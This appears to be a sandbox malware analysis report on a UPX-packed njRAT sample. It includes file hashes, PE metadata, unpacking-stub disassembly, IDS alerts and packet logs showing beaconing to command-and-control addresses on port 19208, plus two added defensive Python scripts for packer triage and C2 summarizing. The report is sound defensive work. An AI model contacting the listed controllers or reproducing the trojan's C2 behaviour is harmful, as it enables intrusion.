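The two flags are the triage signal: a launcher whose target lives under AppData, ProgramData or Temp is not how installed software registers itself, and `on error resume next` exists so the script fails silently if the payload has been removed. A script that trips both, as the one in this report does, belongs in the incident timeline rather than in an exclusion list.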
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                      Entropy (8bit):7.837696717909293
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                      • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      File name:iR2UtZj5vP.exe
                                                                      File size:162'146 bytes
                                                                      MD5:52b074e39e4f3ba00c230ba82eb62499
                                                                      SHA1:054a51bf0c25309a728a8bc14c77262168f134a1
                                                                      SHA256:4c75f91c9974d712ef96b2f6bfe99edc15f110dea80065a59e161e639d08e74d
                                                                      SHA512:fc2126f7fe2b8cc8edf4de3dd701d896c7f997db67945647e907c08fe31a2ebd0eecc3a77746688aac88bd7324c33e65c41a26f9973190a1437d5dc8d855ac4f
                                                                      SSDEEP:3072:tf/J2ULiTehI8FrkZqFMzVg//AY30OKalUPRjejXrcyrD:32UL2i9FJkg//r0OKYUPR6fTD
                                                                      TLSH:56F31245973C0152D022A67EBD66CA4B3246FC7B8BDFC60B0B9DB00B1F565144BDA63B
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+...E...E...E.T.....E...K...E...O...E...A...E...N...E...A...E...D.R.E...N...E.P.C...E.Rich..E.........................PE..L..
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x4439f0
                                                                      Entrypoint Section:UPX1
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x5CEE8DCE [Wed May 29 13:49:02 2019 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:6bac3cfe8acb6c6c4a30aaa022de2388
                                                                      Instruction
                                                                      pushad
                                                                      mov esi, 00430000h
                                                                      lea edi, dword ptr [esi-0002F000h]
                                                                      push edi
                                                                      jmp 00007FB394D2909Dh
                                                                      nop
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      mov byte ptr [edi], al
                                                                      inc edi
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D2907Fh
                                                                      mov eax, 00000001h
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      add ebx, ebx
                                                                      jnc 00007FB394D2909Dh
                                                                      jne 00007FB394D290BAh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D290B1h
                                                                      dec eax
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc eax, eax
                                                                      jmp 00007FB394D29066h
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      jmp 00007FB394D290E4h
                                                                      xor ecx, ecx
                                                                      sub eax, 03h
                                                                      jc 00007FB394D290A3h
                                                                      shl eax, 08h
                                                                      mov al, byte ptr [esi]
                                                                      inc esi
                                                                      xor eax, FFFFFFFFh
                                                                      je 00007FB394D29107h
                                                                      sar eax, 1
                                                                      mov ebp, eax
                                                                      jmp 00007FB394D2909Dh
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D2905Eh
                                                                      inc ecx
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jc 00007FB394D29050h
                                                                      add ebx, ebx
                                                                      jne 00007FB394D29099h
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      adc ecx, ecx
                                                                      add ebx, ebx
                                                                      jnc 00007FB394D29081h
                                                                      jne 00007FB394D2909Bh
                                                                      mov ebx, dword ptr [esi]
                                                                      sub esi, FFFFFFFCh
                                                                      adc ebx, ebx
                                                                      jnc 00007FB394D29076h
                                                                      add ecx, 02h
                                                                      cmp ebp, FFFFFB00h
                                                                      adc ecx, 02h
                                                                      lea edx, dword ptr [edi+ebp]
                                                                      cmp ebp, FFFFFFFCh
                                                                      jbe 00007FB394D290A0h
                                                                      mov al, byte ptr [edx]
                                                                      Programming Language:
                                                                      • [C++] VS98 (6.0) SP6 build 8804
                                                                      • [C++] VS98 (6.0) build 8168
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x44704 | 0x15c | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0x704 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x2f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x30000 | 0x14000 | 0x13c00 | f976291f5d33fb0881f54d329e9595b2 | False | 0.8956314280063291 | data | 7.574554271444251 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x44000 | 0x1000 | 0xa00 | 315d6f2407f2b3acb730679c2592fb2b | False | 0.34609375 | data | 3.0586146234294898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x441ac | 0x134 | data | English | United States | 0.4577922077922078
RT_DIALOG | 0x442e4 | 0x36 | data | English | United States | 0.7962962962962963
RT_DIALOG | 0x44320 | 0x42 | data | English | United States | 0.8181818181818182
RT_STRING | 0x44368 | 0x4a | data | English | United States | 0.6081081081081081
RT_GROUP_CURSOR | 0x443b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_VERSION | 0x443d0 | 0x334 | data | English | United States | 0.4426829268292683
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
GDI32.dll | Escape
MFC42.DLL |
MSVCRT.dll | exit
USER32.dll | IsIconic
Language of compilation system | Country where language is spoken
English | United States
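The static data above carries the whole UPX fingerprint: the entry point (0x4439f0, section UPX1) sits in a 7.57-entropy section, UPX0 has a 0x2f000-byte virtual size but no raw data (it is the unpack destination), and the only kernel32 imports are the six the stub needs to rebuild the real import table. The following is an added example and not part of the Joe Sandbox report: a Python triage script that reads the PE section table with `struct` and scores those signals, first without relying on section names (so a rebuilt UPX with renamed sections is still caught) and then with the name tell on top. `build_sample()` fabricates a minimal PE32 with this report's section layout and entry RVA so the code runs offline; it is a constructed fixture, not the analysed binary, and its filler bytes are a sha256 chain standing in for compressed code.

```python
"""Packer triage from the PE section table. Added example, not part of the report:
parses raw PE32 headers with struct and scores the signals this report's static
data shows (entry point in high-entropy UPX1, virtual-only UPX0, UPX names)."""
import hashlib
import math
import struct

FILE_ALIGN = 0x200


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for empty input."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from raw PE bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(n_sections):  # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw_ptr": raw_ptr, "raw_size": raw_size})
    return entry_rva, sections


def packer_signals(pe: bytes) -> dict:
    entry_rva, sections = parse_pe(pe)
    ep = next((s for s in sections if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"])), None)
    ep_raw = pe[ep["raw_ptr"]:ep["raw_ptr"] + ep["raw_size"]] if ep else b""
    first = sections[0] if sections else None
    return {
        "entry_section": ep["name"] if ep else None,
        "entry_entropy": round(shannon_entropy(ep_raw), 2),
        # Reserved in memory but absent on disk: the stub's unpack destination.
        "virtual_only_first_section": bool(first and first["raw_size"] == 0 and first["vsize"] > 0),
        "upx_names": [s["name"] for s in sections if s["name"].upper().startswith("UPX")],
    }


def looks_packed(pe: bytes) -> bool:
    """Name-independent verdict: entry point in near-random bytes plus a virtual-only section."""
    s = packer_signals(pe)
    return s["entry_entropy"] > 7.0 and s["virtual_only_first_section"]


def looks_upx(pe: bytes) -> bool:
    """Adds the UPX section-name tell; a build with renamed sections defeats only this part."""
    s = packer_signals(pe)
    return looks_packed(pe) and s["entry_section"] in s["upx_names"]


def _filler(n: int, seed: bytes = b"upx1") -> bytes:  # deterministic high-entropy bytes
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def build_sample(packed: bool = True) -> bytes:
    """Constructed PE32 fixture (not the analysed binary). packed=True mirrors the report's
    UPX0/UPX1/.rsrc layout and entry RVA 0x439f0; packed=False puts plain code in .text."""
    if packed:
        layout = [("UPX0", 0x1000, 0x2F000, 0, b""),
                  ("UPX1", 0x30000, 0x14000, 0x400, _filler(0x400)),
                  (".rsrc", 0x44000, 0x1000, 0x200, bytes(range(16)) * 32)]
        entry = 0x439F0
    else:
        layout = [(".text", 0x1000, 0x400, 0x400, bytes(range(64)) * 16),
                  (".rsrc", 0x2000, 0x200, 0x200, bytes(range(16)) * 32)]
        entry = 0x1100
    e_lfanew = 0x80
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew) + bytes(e_lfanew - 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)             # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)  # SectionAlignment, FileAlignment
    headers, body, raw_ptr = b"", b"", FILE_ALIGN
    for name, va, vsize, raw_size, data in layout:
        headers += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, va, raw_size,
                               raw_ptr if raw_size else 0, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    image = dos + b"PE\0\0" + coff + bytes(opt) + headers
    return image.ljust(FILE_ALIGN, b"\0") + body
```

To run it against a real file, pass `open(path, "rb").read()` to `packer_signals()`; the fixture is only there so the verdicts can be checked without the sample. The entropy threshold of 7.0 is a working value for compressed or encrypted code, and the virtual-only first section is the stronger of the two name-independent signals, since a section that exists in memory but not on disk has no reason to exist in a normally linked executable.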
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/05/24-17:11:46.647234 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49705 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:14:07.579174 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49726 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:25.474260 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49715 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:30.626186 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49716 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:13:59.558134 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49725 | 19208 | 192.168.2.11 | 3.6.98.232
02/05/24-17:12:21.856556 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49713 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:34.128286 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49717 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:11:51.063759 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49706 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:15:07.884925 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49727 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:47.573414 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49720 | 19208 | 192.168.2.11 | 3.6.98.232
02/05/24-17:12:50.977611 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49721 | 19208 | 192.168.2.11 | 3.6.98.232
02/05/24-17:12:05.752627 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49709 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:13:00.449419 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49723 | 19208 | 192.168.2.11 | 3.6.98.232
02/05/24-17:12:12.529858 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49711 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:17.572819 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49712 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:42.069121 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49719 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:55.034301 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49722 | 19208 | 192.168.2.11 | 3.6.98.232
02/05/24-17:13:13.604278 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49724 | 19208 | 192.168.2.11 | 3.6.98.232
02/05/24-17:11:55.885933 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49707 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:15:26.191172 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49728 | 19208 | 192.168.2.11 | 3.6.115.182
02/05/24-17:12:37.780074 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49718 | 19208 | 192.168.2.11 | 3.6.122.107
02/05/24-17:12:00.269481 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49708 | 19208 | 192.168.2.11 | 3.6.122.107
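Every alert above is the same ET rule (SID 2033132) firing on a fresh source port toward TCP/19208 on three addresses in the same /16, a few seconds apart: the host is reconnecting to its controller in a loop, and the controller's name resolves to more than one IP over the run. The following is an added example and not part of the Joe Sandbox report: a Python summary that groups such alerts by destination, measures the reconnect cadence per destination and emits the (ip, port) pairs to block or hunt for. The input is a constructed tab-separated copy of eight rows from the alert table above, in its column order; the jitter tolerance and the minimum connection count are assumptions chosen for the demonstration.

```python
"""C2 session summary from IDS alerts. Added example, not part of the report:
groups the Snort hits by destination, measures the reconnect cadence and
emits the (ip, port) pairs a responder would block or hunt for."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed input: eight rows copied from the report's alert table, tab-separated
# in its column order (Timestamp, Protocol, SID, Message, Src Port, Dst Port, Src IP, Dst IP).
MSG = "ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)"
ALERTS = "\n".join(f"{ts}\tTCP\t2033132\t{MSG}\t{sport}\t19208\t192.168.2.11\t{dst}" for ts, sport, dst in [
    ("02/05/24-17:11:46.647234", 49705, "3.6.122.107"),
    ("02/05/24-17:11:51.063759", 49706, "3.6.122.107"),
    ("02/05/24-17:11:55.885933", 49707, "3.6.122.107"),
    ("02/05/24-17:12:00.269481", 49708, "3.6.122.107"),
    ("02/05/24-17:12:47.573414", 49720, "3.6.98.232"),
    ("02/05/24-17:12:50.977611", 49721, "3.6.98.232"),
    ("02/05/24-17:12:55.034301", 49722, "3.6.98.232"),
    ("02/05/24-17:15:26.191172", 49728, "3.6.115.182"),
])


def parse_alerts(text: str) -> list:
    """One dict per non-empty line; the timestamp is Snort's mm/dd/yy-HH:MM:SS.ffffff form."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, proto, sid, msg, sport, dport, src, dst = line.split("\t")
        rows.append({"ts": datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"), "proto": proto,
                     "sid": int(sid), "msg": msg, "sport": int(sport), "dport": int(dport),
                     "src": src, "dst": dst})
    return rows


def summarize_c2(alerts: list, min_connections: int = 3, jitter: float = 0.3) -> dict:
    """Per destination IP: connection count, ports, SIDs, time span, median gap between
    consecutive connections and a beaconing flag (every gap within +/- jitter of the median)."""
    by_dst = defaultdict(list)
    for a in sorted(alerts, key=lambda row: row["ts"]):
        by_dst[a["dst"]].append(a)
    summary = {}
    for dst, rows in by_dst.items():
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rows, rows[1:])]
        median = statistics.median(gaps) if gaps else None
        beaconing = len(rows) >= min_connections and all(abs(g - median) <= jitter * median for g in gaps)
        summary[dst] = {
            "connections": len(rows),
            "dst_ports": sorted({r["dport"] for r in rows}),
            "sids": sorted({r["sid"] for r in rows}),
            "first": rows[0]["ts"], "last": rows[-1]["ts"],
            "median_gap_s": None if median is None else round(median, 3),
            "beaconing": beaconing,
        }
    return summary


def block_list(summary: dict) -> list:
    """(ip, port) pairs in a stable order, ready for a firewall rule or a hunt query."""
    return sorted((dst, port) for dst, s in summary.items() for port in s["dst_ports"])


if __name__ == "__main__":
    for dst, s in summarize_c2(parse_alerts(ALERTS)).items():
        print(f'{dst}:{s["dst_ports"]} n={s["connections"]} gap={s["median_gap_s"]}s beaconing={s["beaconing"]}')
    print(block_list(summarize_c2(parse_alerts(ALERTS))))
```

A single-connection destination such as 3.6.115.182 gets no cadence and no beaconing flag, which is the right outcome: one hit is an indicator to pivot on, not evidence of a loop. Blocking by IP is the weak control here, since the sample reached three addresses in under four minutes; the port and the rule's content match are what carry across the controller's address changes.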
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 5, 2024 17:11:44.461122990 CET | 49705 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:44.772427082 CET | 19208 | 49705 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:44.772525072 CET | 49705 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:45.086916924 CET | 19208 | 49705 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:45.086986065 CET | 49705 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:46.647233963 CET | 49705 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:46.959233999 CET | 19208 | 49705 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:48.855747938 CET | 49706 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:49.169471025 CET | 19208 | 49706 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:49.169600010 CET | 49706 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:49.480331898 CET | 19208 | 49706 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:49.480896950 CET | 49706 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:51.063759089 CET | 49706 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:51.373941898 CET | 19208 | 49706 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:54.165860891 CET | 49707 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:54.470952034 CET | 19208 | 49707 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:54.471024036 CET | 49707 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:54.777709961 CET | 19208 | 49707 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:54.777765989 CET | 49707 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:55.885932922 CET | 49707 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:56.190927029 CET | 19208 | 49707 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:57.950170994 CET | 49708 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:58.260083914 CET | 19208 | 49708 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:58.260174990 CET | 49708 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:11:58.575297117 CET | 19208 | 49708 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:11:58.575376034 CET | 49708 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:00.269480944 CET | 49708 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:00.579313993 CET | 19208 | 49708 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:12:02.458180904 CET | 49709 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:02.774496078 CET | 19208 | 49709 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:12:02.774601936 CET | 49709 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:03.091116905 CET | 19208 | 49709 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:12:03.091185093 CET | 49709 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:05.752626896 CET | 49709 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:06.068674088 CET | 19208 | 49709 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:12:07.898121119 CET | 49711 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:08.210830927 CET | 19208 | 49711 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:12:08.210968971 CET | 49711 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:08.523726940 CET | 19208 | 49711 | 3.6.122.107 | 192.168.2.11
Feb 5, 2024 17:12:08.523829937 CET | 49711 | 19208 | 192.168.2.11 | 3.6.122.107
Feb 5, 2024 17:12:12.529858112 CET | 49711 | 19208 | 192.168.2.11 | 3.6.122.107
                                                                      Feb 5, 2024 17:12:12.842376947 CET19208497113.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:14.995137930 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:15.300496101 CET19208497123.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:15.300612926 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:15.606224060 CET19208497123.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:15.606290102 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:17.572818995 CET4971219208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:17.878174067 CET19208497123.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:19.640156031 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:19.947216988 CET19208497133.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:19.947335958 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:20.254456997 CET19208497133.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:20.254507065 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:21.856555939 CET4971319208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:22.163645983 CET19208497133.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:23.966906071 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:24.281591892 CET19208497153.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:24.281711102 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:24.596368074 CET19208497153.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:24.596488953 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:25.474260092 CET4971519208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:25.788697958 CET19208497153.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:27.515460968 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:27.830136061 CET19208497163.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:27.830236912 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:28.145143032 CET19208497163.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:28.145215988 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:30.626185894 CET4971619208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:30.940824032 CET19208497163.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:32.704363108 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:33.016388893 CET19208497173.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:33.016470909 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:33.328491926 CET19208497173.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:33.328646898 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:34.128285885 CET4971719208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:34.440009117 CET19208497173.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:36.196820021 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:36.511382103 CET19208497183.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:36.513665915 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:36.834479094 CET19208497183.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:36.836617947 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:37.780073881 CET4971819208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:38.094635010 CET19208497183.6.122.107192.168.2.11
                                                                      Feb 5, 2024 17:12:39.908974886 CET4971919208192.168.2.113.6.122.107
                                                                      Feb 5, 2024 17:12:40.215949059 CET19208497193.6.122.107192.168.2.11
